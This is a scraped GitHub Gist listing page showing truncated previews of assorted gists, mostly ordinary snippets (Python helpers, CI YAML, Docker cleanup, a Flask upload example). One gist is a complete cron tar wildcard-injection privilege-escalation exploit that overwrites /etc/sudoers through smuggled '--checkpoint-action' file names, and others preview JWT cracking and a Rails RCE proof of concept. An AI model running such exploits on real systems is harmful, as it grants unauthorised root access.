Skip to content

Instantly share code, notes, and snippets.

View Anon-Exploiter's full-sized avatar
🎯
Making Memes & writing code :)

Syed Umar Arfeen Anon-Exploiter

🎯
Making Memes & writing code :)
587 followers · 0 following
View GitHub Profile
@carlosplanchon
carlosplanchon / multiparameter_callback.py
Last active July 25, 2022 01:32
#!/usr/bin/env python3
from inspect import _empty, signature
def get_multiparameter_callback(callback, **parameters):
callback_sig_p = signature(callback).parameters
# If some provider parameter does not belong to callback parameters.
unexpected_parameters = list(parameters.keys() - callback_sig_p.keys())
if len(unexpected_parameters) > 0:
@CaptBoykin
CaptBoykin / linux_privesc_cron_tar_wildcard.txt
Last active October 10, 2022 10:09
Cron Tar Wildcard Injection (Linux Privesc)
// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE>
echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh
echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh
echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh
echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
@ethomson
ethomson / matrix-example.yml
Last active March 5, 2023 12:03
name: CI
on: [push]
jobs:
build:
runs-on: ubuntu-latest
strategy:
matrix:
@lekro
lekro / reminder.sh
Created April 15, 2018 02:39
Send discord webhook using curl
#!/bin/sh
WEBHOOK_URL="put your url here"
PING="<@put your user id here>"
MESSAGE="$PING reminder"
JSON="{\"content\": \"$MESSAGE\"}"
curl -d "$JSON" -H "Content-Type: application/json" "$WEBHOOK_URL"
@ignis-sec
ignis-sec / bb-foxyproxy-pattern.json
Created June 24, 2020 09:06
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
{
"30523382": {
"className": "Proxy",
"data": {
"bypassFPForPAC": true,
"color": "#f57575",
"configUrl": "",
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
"cycle": false,
"enabled": true,
@yoavram
yoavram / client.py
Created December 21, 2012 08:41
Example of uploading binary files programmatically in python, including both client and server code. Client implemented with the requests library and the server is implemented with the flask library.
import requests
#http://docs.python-requests.org/en/latest/user/quickstart/#post-a-multipart-encoded-file
url = "http://localhost:5000/"
fin = open('simple_table.pdf', 'rb')
files = {'file': fin}
try:
r = requests.post(url, files=files)
print r.text
@schleumer
schleumer / CLEAN-THE-FUCKING-DOCKER.fish
Last active April 13, 2023 22:33
function remove-docker-containers
echo "Stop running shit"
docker stop (docker ps -q)
echo "Remove the whale shit"
docker rm (docker ps -a -q)
end
function remove-docker-images
remove-docker-containers
@pich4ya
pich4ya / crack_jwt.txt
Last active June 19, 2023 16:13
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
Target:
{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
@postmodern
postmodern / rails_rce.rb
Last active July 17, 2023 11:54
Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#
# ## Advisory
#
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#
@xxnjdlys
xxnjdlys / add log to smali code
Created April 10, 2015 06:43
add log to smali code
package com.sadieyu.logg;
import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
/*
.class public Lcom/sadieyu/logg/MainActivity;
.super Landroid/app/Activity;
.source "MainActivity.java"